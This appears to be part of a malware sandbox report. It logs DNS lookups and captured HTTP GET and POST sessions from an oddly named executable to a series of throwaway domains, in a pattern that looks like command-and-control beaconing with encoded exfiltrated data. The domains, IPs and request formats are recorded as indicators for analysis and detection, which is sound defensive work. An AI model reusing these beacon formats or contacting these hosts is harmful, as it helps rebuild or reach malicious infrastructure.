                                                                    Jan 10, 2025 09:12:01.701426029 CET5814553192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:12:01.710093975 CET53581451.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:12:10.298854113 CET4941253192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:12:10.352669954 CET53494121.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:12:24.501889944 CET6151353192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:12:24.845916986 CET53615131.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:12:39.172780991 CET6284553192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:12:39.650697947 CET53628451.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:12:53.233191013 CET5447053192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:12:53.255156994 CET53544701.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:13:09.796221018 CET5921853192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:13:09.820092916 CET53592181.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:13:23.170207024 CET6381753192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:13:24.022773981 CET53638171.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:13:37.988543034 CET6516753192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:13:38.068217993 CET53651671.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:13:51.652394056 CET6537053192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:13:51.740695953 CET53653701.1.1.1192.168.2.6
                                                                    Jan 10, 2025 09:13:59.887447119 CET6286753192.168.2.61.1.1.1
                                                                    Jan 10, 2025 09:13:59.907392025 CET53628671.1.1.1192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 10, 2025 09:10:55.796648026 CET192.168.2.61.1.1.10x6030Standard query (0)www.kx22368.shopA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:12.060868025 CET192.168.2.61.1.1.10xb70fStandard query (0)www.laduta.xyzA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:25.348342896 CET192.168.2.61.1.1.10x6984Standard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:39.325790882 CET192.168.2.61.1.1.10xeb53Standard query (0)www.ripbgs.infoA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:53.637645960 CET192.168.2.61.1.1.10xe082Standard query (0)www.0303588a47.buzzA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:01.701426029 CET192.168.2.61.1.1.10x61e9Standard query (0)www.tizzles.techA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:10.298854113 CET192.168.2.61.1.1.10xc498Standard query (0)www.explorevision.xyzA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:24.501889944 CET192.168.2.61.1.1.10x4fd3Standard query (0)www.babyzhibo.netA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.172780991 CET192.168.2.61.1.1.10x4eb2Standard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:53.233191013 CET192.168.2.61.1.1.10x949bStandard query (0)www.potorooqr.lolA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:09.796221018 CET192.168.2.61.1.1.10xfd9eStandard query (0)www.infovea.techA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:23.170207024 CET192.168.2.61.1.1.10x1f76Standard query (0)www.itcomp.storeA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:37.988543034 CET192.168.2.61.1.1.10x66e7Standard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:51.652394056 CET192.168.2.61.1.1.10xc518Standard query (0)www.glyttera.shopA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:59.887447119 CET192.168.2.61.1.1.10xf10aStandard query (0)www.overlayoasis.questA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 10, 2025 09:10:56.151990891 CET1.1.1.1192.168.2.60x6030No error (0)www.kx22368.shopurl.gname.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 09:10:56.151990891 CET1.1.1.1192.168.2.60x6030No error (0)url.gname.net172.65.235.97A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:12.082726955 CET1.1.1.1192.168.2.60xb70fNo error (0)www.laduta.xyz192.64.119.109A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:25.362319946 CET1.1.1.1192.168.2.60x6984No error (0)www.einpisalpace.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:25.362319946 CET1.1.1.1192.168.2.60x6984No error (0)www.einpisalpace.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:39.342988014 CET1.1.1.1192.168.2.60xeb53No error (0)www.ripbgs.info47.83.1.90A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:11:53.647073030 CET1.1.1.1192.168.2.60xe082Name error (3)www.0303588a47.buzznonenoneA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:01.710093975 CET1.1.1.1192.168.2.60x61e9Name error (3)www.tizzles.technonenoneA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:10.352669954 CET1.1.1.1192.168.2.60xc498No error (0)www.explorevision.xyz162.0.236.169A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:24.845916986 CET1.1.1.1192.168.2.60x4fd3No error (0)www.babyzhibo.net192.186.58.31A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.64.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.80.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.112.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.32.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.96.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.16.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:39.650697947 CET1.1.1.1192.168.2.60x4eb2No error (0)www.mzkd6gp5.top104.21.48.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:12:53.255156994 CET1.1.1.1192.168.2.60x949bNo error (0)www.potorooqr.lol127.0.0.1A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:09.820092916 CET1.1.1.1192.168.2.60xfd9eNo error (0)www.infovea.techinfovea.techCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:09.820092916 CET1.1.1.1192.168.2.60xfd9eNo error (0)infovea.tech76.223.67.189A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:09.820092916 CET1.1.1.1192.168.2.60xfd9eNo error (0)infovea.tech13.248.213.45A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:24.022773981 CET1.1.1.1192.168.2.60x1f76No error (0)www.itcomp.storeitcomp.storeCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:24.022773981 CET1.1.1.1192.168.2.60x1f76No error (0)itcomp.store103.247.11.204A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:38.068217993 CET1.1.1.1192.168.2.60x66e7No error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:38.068217993 CET1.1.1.1192.168.2.60x66e7No error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:51.740695953 CET1.1.1.1192.168.2.60xc518Name error (3)www.glyttera.shopnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:59.907392025 CET1.1.1.1192.168.2.60xf10aNo error (0)www.overlayoasis.quest172.67.148.216A (IP address)IN (0x0001)false
                                                                    Jan 10, 2025 09:13:59.907392025 CET1.1.1.1192.168.2.60xf10aNo error (0)www.overlayoasis.quest104.21.55.137A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.kx22368.shop
                                                                    • www.laduta.xyz
                                                                    • www.einpisalpace.shop
                                                                    • www.ripbgs.info
                                                                    • www.explorevision.xyz
                                                                    • www.babyzhibo.net
                                                                    • www.mzkd6gp5.top
                                                                    • www.infovea.tech
                                                                    • www.itcomp.store
                                                                    • www.100millionjobs.africa
                                                                    • www.overlayoasis.quest

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.649982172.65.235.97806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:10:56.173058033 CET519OUTGET /ca6n/?-0-L9xY=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kx22368.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:10:56.984431028 CET302INHTTP/1.1 503 Service Temporarily Unavailable
                                                                    Date: Fri, 10 Jan 2025 08:10:56 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: 56fd9e85ebadb2723800014374fae84a=b5887e17bb899062c5ea7d22ac13c1ac
                                                                    Data Raw: 33 37 0d 0a 4c 6f 61 64 69 6e 67 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 37Loading in progress.<script>location.href="";</script>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649983192.64.119.109806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:12.101990938 CET769OUTPOST /d89m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.laduta.xyz
                                                                    Origin: http://www.laduta.xyz
                                                                    Referer: http://www.laduta.xyz/d89m/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34
                                                                    Data Ascii: -0-L9xY=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                                                                    Jan 10, 2025 09:11:12.567893982 CET193INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:11:12 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Location: https://laduta.xyz/d89m
                                                                    X-Served-By: Namecheap URL Forward
                                                                    Server: namecheap-nginx


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.649985192.64.119.109806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:14.702112913 CET793OUTPOST /d89m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.laduta.xyz
                                                                    Origin: http://www.laduta.xyz
                                                                    Referer: http://www.laduta.xyz/d89m/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 33 2f 64 46 31 70 64 4a 71 77 63 5a 5a 2b 6f 71 4b 73 72 70 49 59 50 67 53 54 6a 74 52 46 42 72 5a 79 32 70 67 46 30 53 75 66 4c 4c 6a 4d 6a 53 54 34 74 63 39 33 43 59 51 76 37 55 71 46 50 51 30 56 4a 69 68 63 53 64 6b 70 79 56 36 4c 4f 6d 4c 36 4a 4e 6e 72 36 42 36 5a 2b 6d 35 75 70 32 46 55 6c 70 33 4d 62 43 77 72 68 64 41 2b 64 52 4d 47 66 6b 5a 35 74 6a 75 37 35 70 53 33 4b 6f 73 4f 69 4a 38 44 46 49 50 70 37 7a 75 5a 39 58 51 37 75 45 6d 31 59 44 42 6c 38 69 45 52 72 54 4e 62 59 2b 54 71 39 65 7a 58 39 50 51 32 57 48 4c 50 43 34 45 54 42 67 3d 3d
                                                                    Data Ascii: -0-L9xY=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY293/dF1pdJqwcZZ+oqKsrpIYPgSTjtRFBrZy2pgF0SufLLjMjST4tc93CYQv7UqFPQ0VJihcSdkpyV6LOmL6JNnr6B6Z+m5up2FUlp3MbCwrhdA+dRMGfkZ5tju75pS3KosOiJ8DFIPp7zuZ9XQ7uEm1YDBl8iERrTNbY+Tq9ezX9PQ2WHLPC4ETBg==
                                                                    Jan 10, 2025 09:11:15.182732105 CET193INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:11:15 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Location: https://laduta.xyz/d89m
                                                                    X-Served-By: Namecheap URL Forward
                                                                    Server: namecheap-nginx


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.649986192.64.119.109806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:17.252322912 CET1806OUTPOST /d89m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.laduta.xyz
                                                                    Origin: http://www.laduta.xyz
                                                                    Referer: http://www.laduta.xyz/d89m/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 76 2f 64 32 39 70 48 75 32 77 64 5a 5a 2b 30 61 4b 34 72 70 49 2f 50 67 4b 58 6a 74 4d 79 42 75 56 79 77 50 30 46 6b 68 32 66 46 4c 6a 4d 76 79 54 35 77 73 38 74 43 5a 38 6a 37 55 61 46 50 51 30 56 4a 6b 4e 63 52 49 49 70 30 56 36 4d 59 57 4c 2b 4e 4e 6d 45 36 41 66 75 2b 6d 4e 2b 6f 46 4e 55 6d 4a 6e 4d 5a 30 73 72 6f 64 41 38 52 78 4d 65 66 6b 45 37 74 6a 69 5a 35 6f 57 64 4b 6f 49 4f 6e 76 35 55 42 34 7a 49 74 42 71 72 6f 31 6f 33 75 53 57 2f 53 42 4a 65 74 6a 77 47 30 53 38 78 56 6f 44 4b 33 66 79 57 39 4f 6b 57 57 77 54 62 4c 6f 70 71 56 67 34 72 4b 61 77 78 39 4b 6f 59 36 68 49 6d 77 42 78 45 68 70 4c 43 75 4e 63 51 44 30 57 70 38 6a 4e 52 64 79 63 4b 41 54 77 47 68 2f 45 53 66 4c 57 72 34 4e 57 45 41 46 4a 68 49 6a 63 44 34 72 79 34 76 79 4f 68 33 4d 52 6c 43 79 32 7a 59 6a 37 79 6d 58 4d 4d 46 39 42 52 51 7a 6b 6e 66 6e 45 55 4c 78 42 38 42 5a [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY29v/d29pHu2wdZZ+0aK4rpI/PgKXjtMyBuVywP0Fkh2fFLjMvyT5ws8tCZ8j7UaFPQ0VJkNcRIIp0V6MYWL+NNmE6Afu+mN+oFNUmJnMZ0srodA8RxMefkE7tjiZ5oWdKoIOnv5UB4zItBqro1o3uSW/SBJetjwG0S8xVoDK3fyW9OkWWwTbLopqVg4rKawx9KoY6hImwBxEhpLCuNcQD0Wp8jNRdycKATwGh/ESfLWr4NWEAFJhIjcD4ry4vyOh3MRlCy2zYj7ymXMMF9BRQzknfnEULxB8BZgZgyaBZZDMi/YPEmvKll7pIUOfbe6t4Ywm7+f2TfrYgLClnyIgQRz8+VBV2cb5jQc2uRQGRaHQHvXUbwFFbDlXucW9+y3+r6D1xpUfBAmxqKXRTVp4l0E07y23YOfl1mV9Ra7vN97kZ2h0RkWatofT7zcVxWQze1Ovptsp7CRBlM/9W3BDcQv2XCyC8ifOS0p6qEXn9N3ICwJaBARYVG7JjNKwbbHG1Q0T3Vci8ClFrx6xm5YcfNtCxfXpWRy75+wdTzJAiZ2puXmXulpaFMfiTIj5boq1QexKh0ccK+WMYyJGGKdUrM3Wd4Q/+aMM4XWzt5pFExbJGNJaC8nNewJFWHqs4RZwUScDfqsLI96k4JKaV2ZRwMcrQyONRMTZac8+WrsCC1MgIuoYfUL4rNde6tEhAGZ8XFneW7mii+xWtkcTapKSKnmpCLbX8HEWIdl0FJ5WMzWxv7VtZAK9yea8Nn2IlERF8di65rqC1fR04KVNGzLRjfhUo8XQp3LcedAiGnSPSrdq3QnnMBIkcOsFL2xRhdzcrx2lld6m9q6HZ1u0EN6E3dWl1SfFXEfvDJ7lmTQvML9h7xCHcR8NQkT25SVazB/ItmgXomfmEqMhlXo8ycp7fwQZsCvUbs4YJcVl+sKCvlv+AnWroq0D+0fIM6PSjH7+sQ35 [TRUNCATED]
                                                                    Jan 10, 2025 09:11:17.714900017 CET193INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:11:17 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Location: https://laduta.xyz/d89m
                                                                    X-Served-By: Namecheap URL Forward
                                                                    Server: namecheap-nginx


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.649987192.64.119.109806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:19.991816998 CET517OUTGET /d89m/?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.laduta.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:11:20.332204103 CET615INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:11:20 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 213
                                                                    Connection: close
                                                                    Location: https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&Mn=PdO8wZnxGnZX
                                                                    X-Served-By: Namecheap URL Forward
                                                                    Server: namecheap-nginx
                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 64 75 74 61 2e 78 79 7a 2f 64 38 39 6d 3f 2d 30 2d 4c 39 78 59 3d 77 4f 4a 74 6a 78 42 55 4a 47 30 4e 48 70 35 36 49 4a 37 73 64 25 32 46 31 56 33 75 37 32 64 61 59 4f 70 52 52 37 37 4a 30 68 71 39 7a 77 64 55 5a 4f 4a 72 65 4e 55 4b 6c 2b 6f 4c 6a 48 71 2b 51 49 53 58 37 31 73 74 52 54 4f 4a 31 6a 76 34 38 46 25 32 46 54 53 59 4f 4f 6a 69 6b 57 72 49 78 4f 41 70 46 75 35 41 35 44 69 4f 51 32 77 54 47 6d 41 43 65 4a 35 59 38 58 32 78 53 78 58 2b 57 61 4c 45 75 6c 44 6c 38 77 73 25 33 44 26 4d 6e 3d 50 64 4f 38 77 5a 6e 78 47 6e 5a 58 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                    Data Ascii: <a href='https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&Mn=PdO8wZnxGnZX'>Found</a>.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.649988188.114.96.3806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:25.520510912 CET790OUTPOST /pgw3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.einpisalpace.shop
                                                                    Origin: http://www.einpisalpace.shop
                                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 74 67 39 44 36 52 52 68 71 39 4d 54 7a 47 30 6b 77 71 51 44 74 39 47 64 75 38 50 72 75 73 44 4c 51 41 62 6d 2f 73 49 50 4a 45 6e 58 54 33 31 4e 38 45 50 72 6b 2b 76 54 34 4a 4f 6d 48 77 66 48 63 49 58 76 38 6c 36 44 45 2f 38 67 6a 53 6e 4d 34 44 79 31 6a 6c 43 43 53 2f 6d 77 68 63 2f 70 4b 4c 53 48 6e 42 5a 56 51 44 77 57 74 38 34 75 57 4e 75 6e 70 2f 2b 4d 73 71 49 74 30 37 74 77 44 5a 6f 48 74 6e 4b 58 63 54 71 66 6f 65 35 7a 30 39 43 36 65 47 53 58 6e 44 2b 55 6d 35 6e 68 2b 78 76 31 61 53 6e 6a 57 34 76 65 36 43 61 70 79 58 36 34 45 43 6d 59 44 71 61 4c 6a 69 50 72 6d 41 32 6e 62 48 75 64 38 37 78 36
                                                                    Data Ascii: -0-L9xY=tg9D6RRhq9MTzG0kwqQDt9Gdu8PrusDLQAbm/sIPJEnXT31N8EPrk+vT4JOmHwfHcIXv8l6DE/8gjSnM4Dy1jlCCS/mwhc/pKLSHnBZVQDwWt84uWNunp/+MsqIt07twDZoHtnKXcTqfoe5z09C6eGSXnD+Um5nh+xv1aSnjW4ve6CapyX64ECmYDqaLjiPrmA2nbHud87x6
                                                                    Jan 10, 2025 09:11:26.645780087 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:11:26 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L70RIiBmOYfKGjaYeipFVbIyeXCyhl779EQGsO0G9bSmUGHUZDh29N%2B%2BHvBInc%2FjkLxZohVOuZDcG4lOOjnZuit0oaiVPh9hWeBtF4cxOfsYeQSY6vrgD1yV7skN%2FRGEWDD4%2B9miRAo%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb323efcdb4321-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
